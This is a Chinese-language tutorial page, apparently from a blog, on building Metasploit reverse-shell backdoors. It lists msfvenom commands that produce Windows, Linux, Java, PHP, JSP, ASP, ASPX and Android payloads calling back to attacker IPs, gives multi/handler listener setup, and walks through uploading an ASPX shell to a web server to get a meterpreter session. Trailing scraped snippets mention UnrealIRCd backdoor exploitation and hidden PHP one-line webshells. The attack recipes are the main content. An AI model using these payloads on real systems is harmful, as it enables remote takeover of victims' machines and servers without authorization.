Metasploit之多种后门生成

本章节的后门有以下几种

windows    -->使用模块“windows/meterpreter/reverse_tcp”

命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe

参考“09-Metasploit之我的远程控制软件”

linux      -->使用模块“linux/x86/meterpreter/shell_rverse_tcp”

命令:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 X >text

参考文章:http://xiao106347.blog.163.com/blog/static/215992078201310253172937/

java       -->使用模块“java/meterpreter/reverse_tcp”

命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 W >text.jar

php        -->使用模块“php/meterpreter/reverse_tcp”

命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php

参考文章:http://www.111cn.net/phper/phpanqn/101228.htm

jsp        -->使用模块“java/jsp_shell_reverse_tcp”

命令:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.jsp

参考文章:http://netsecurity.51cto.com/art/201406/442648.htm

asp        -->使用模块“windows/meterpreter/reverse_tcp”

命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp

参考文章:http://www.ithao123.cn/content-10813776.html

aspx       -->使用模块“windows/meterpreter/reverse_tcp”

命令:msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx

参考文章:http://www.ithao123.cn/content-10813776.html

android    -->使用模块“android/meterpreter/reverse_tcp”

命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.apk

参考“13-Metasploit之渗透安卓实战”

反弹连接的访问:

use exploit/multi/handler

set PAYLOAD <Payload name>

set LHOST <LHOST value>

set LPORT <LPORT value>

set ExitOnSession false

exploit -j -z

------------------------------------------------------------------------------------------------

Metasploit-web渗透

参考文献:http://www.ithao123.cn/content-10813776.html

首先用Metasploit生成反弹马,也就是生成反弹的payload:

成功生成反弹型payload:

(1)

生成win下的exe

msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe

(2)

生成win下的aspx

msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx

其他的生成payload 的方法见:http://netsec.ws/?p=331

(3)

我生成一个aspx的反弹马

然后启动msfconsole

(4)

本地监听,反弹后的控制端:use exploit/multi/handler

(5)

本地监听的确定用哪个payload:

set payload windows/meterpreter/reverse_tcp

(6)

设置本地监听的端口:

set lport 7788

(7)

设置本地的监听的地址:

set lhost 0.0.0.0

(8)

运行:

run

(9)

访问生成的反弹马:

http://xxx.xxx.xx.xxx:/back.aspx

得到meterpreter的shell

时间: 2024-10-14 06:55:53

Metasploit之多种后门生成的相关文章

Metasploit溢出UnrealIRCd后门漏洞

利用UnrealIRCd后门漏洞,获取目标主机的root权限. 某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码. 一.利用nmap工具扫描目标主机 1.1使用nmap命令对目标主机进行扫描.单击桌面空白处,右键菜单选择"在终端中打开". 1.2在终端中输入命令"nmap –sV  192.168.1.3",对目标主机进行端口扫描,发现开放6667端口,对应的服务为unreal ircd.

MSF-Shellcode生成和使用

1      使用环境 Kali 2.0 msfvenom 2      Msfvenom参数说明 msfvenom –h    查看帮助 说明: Options: -p, --payload     <payload>       指定需要使用的payload(攻击荷载).如果需要使用自定义的payload,请使用'-'或者stdin指定 -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, n

2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell, 任务计划启动 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 基础问题 例举你能想到的一个后门进入到你系统中的可能

java DMO及增删改查代码的自动生成

在web开发过程中,尤其是后台管理系统的开发中,少不了增删改成的基础操作,原来我自己的做法是一份一份的拷贝粘贴,然后修改其中的不同,然而这样既枯燥无味又浪费了大量的时间,所以根据自己项目结构的特点写了一个自动生成结构代码的工具jar包,可以根据数据库表直接生成相应数据库模型对象(DMO)以及对表的增删改查代码. 之前我考虑过多种自动生成代码的提供方式,比如web的方式,通过在页面文本框里面输入各种参数,比如模板文件地址,生成文件地址,数据库名,数据库用户名和密码等,点击生成按钮就可以生成源代码文

Metasploit中数据库的密码查看以及使用pgadmin远程连接数据库

我们都知道,在msf下进行渗透测试工作的时候,可以将结果数据保存到数据库中,方便各个小组成员在渗透测试过程中的数据同步. 例如,Metasploit提供了db_nmap命令,它能够将Nmap扫描结果直接存入数据库中,此外还提供了db_import命令,支持多达20中扫描器扫描结果的导入. Metasploit支持多种数据库,如:MySQL.SQLite3.PostgreSQL,其中PostgreSQL被作为默认数据库使用. 要启用msfconsole的时候,首先需要启用postgresql和me

强大的PHP一句话后门

强悍的PHP一句话后门  这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的. 今天我们细数一些有意思的PHP一句话木马. 1.利用404页面隐藏PHP小马:  1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 2 <html><head> 3 <title>404 Not Found</title>

强悍的PHP一句话后门 -更多请收藏本站 欢迎阅读

这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用404页面隐藏PHP小马 01 02 03 04 05 06 07 08 09 10 11 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found<

Metasploit profiling工具的利用

Metasploit profiling工具的利用 Metasploit 5.0.81版本中,新增加了一个profiling工具.大学霸IT达人 用户通过使用该工具,可以分析内存和CPU的使用情况.如果要使用profiling工具,则需要安装ruby-prof和ruby-memory-profiler工具.否则,生成CPU或内存报告时,将分别出现如下错误提示:`require': cannot load such file -- ruby-prof (LoadError) #生成CPU报告的错误

20179311《网络攻防实践》第七周作业

1.Windows操作系统的基本结构 分为运行于处理器特权模式的操作系统内核,以及运行在处理器非特权模式的用户空间代码.采用宏内核模式来进行构架,这使得任意的内核模块或设备驱动程序都可能破坏其他内核模块数据,这种宏内核机制也使得Windows操作系统容易遭受以驱动方式植入内核的Rootkit的危害,为了避免这类攻击,最新的Windows7缺省要求所以请求安装进入内核执行的设备驱动程序都需要经过数字签名,这能够有效地提升内核的安全性.同时,由于用户态程序对操作系统内核特权代码和数据没有直接访问的权